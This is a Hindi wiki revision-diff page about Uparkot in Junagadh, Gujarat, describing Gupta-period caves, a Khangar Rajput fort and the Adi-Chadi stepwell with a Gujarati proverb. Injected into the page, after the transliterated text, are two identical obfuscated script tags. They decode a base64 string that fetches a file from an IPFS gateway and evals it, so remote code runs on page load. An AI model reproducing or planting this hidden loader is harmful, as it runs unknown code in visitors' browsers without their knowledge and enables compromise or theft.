Difference between revisions of "उपरकोट"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{पुनरीक्षण}} उपरकोट गुजरात राज्य के जूनागढ़ ज़िलें...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
{{पुनरीक्षण}}
+
*उपरकोट [[गुजरात]] राज्य के जूनागढ़ ज़िलें में स्थित है।  
उपरकोट [[गुजरात]] राज्य के जूनागढ़ ज़िलें में स्थित है। उपरकोट में संभवत: गुप्तकालीन कई गुफाएं है जो दोमंजिली हैं। गुफाओं के स्तंभों पर उभरी हुई धारियाँ अंकित हैं जो गुप्तकालीन गुहास्तंभी की विशिष्ट अलंकरण शैली थी। गुर्जरनरेश सिद्धराज के शासनकाल में यहाँ खंगार राजपूतों का एक दुर्ग था और दुर्ग के निकट अड़ीचड़ी बाव नाम की एक बाबड़ी थी जो आज भी विद्यमान है। इस बावड़ी के संबंध में यहाँ एक गुजराती कहावत भी प्रचलित है- '
+
*उपरकोट में संभवत: गुप्तकालीन कई गुफाएं है जो दोमंजिली हैं।  
:अड़ीचड़ी बाव अने नौगुण कुआ जेणो न जोयो तो जीवितो मुयो'
+
*गुफाओं के स्तंभों पर उभरी हुई धारियाँ अंकित हैं जो गुप्तकालीन गुहास्तंभी की विशिष्ट अलंकरण शैली थी।  
 +
*गुर्जरनरेश सिद्धराज के शासनकाल में यहाँ खंगार राजपूतों का एक दुर्ग था और दुर्ग के निकट अड़ीचड़ी बाव नाम की एक बाबड़ी थी जो आज भी विद्यमान है।  
 +
*इस बावड़ी के संबंध में यहाँ एक गुजराती कहावत भी प्रचलित है- '
 +
'''अड़ीचड़ी बाव अने नौगुण कुआ जेणो न जोयो तो जीवितो मुयो'''
 +
 
 
अर्थात् अड़ीचड़ी बाव और नौगुण कुआ जिसने नहीं देखा वह जीवित ही मृत है।  
 
अर्थात् अड़ीचड़ी बाव और नौगुण कुआ जिसने नहीं देखा वह जीवित ही मृत है।  
  
Line 16: Line 20:
 
[[Category:गुजरात के ऐतिहासिक स्थान]]
 
[[Category:गुजरात के ऐतिहासिक स्थान]]
 
[[Category:ऐतिहासिक स्थान कोश]]
 
[[Category:ऐतिहासिक स्थान कोश]]
[[Category:नया पन्ना]]
 
 
__INDEX__
 
__INDEX__

Revision as of 10:44, 19 August 2011

  • uparakot gujarat rajy ke joonagadh zilean mean sthit hai.
  • uparakot mean sanbhavat: guptakalin kee guphaean hai jo domanjili haian.
  • guphaoan ke stanbhoan par ubhari huee dhariyaan aankit haian jo guptakalin guhastanbhi ki vishisht alankaran shaili thi.
  • gurjaranaresh siddharaj ke shasanakal mean yahaan khangar rajapootoan ka ek durg tha aur durg ke nikat a dich di bav nam ki ek bab di thi jo aj bhi vidyaman hai.
  • is bav di ke sanbandh mean yahaan ek gujarati kahavat bhi prachalit hai- '

a dich di bav ane naugun kua jeno n joyo to jivito muyo

arthath a dich di bav aur naugun kua jisane nahian dekha vah jivit hi mrit hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh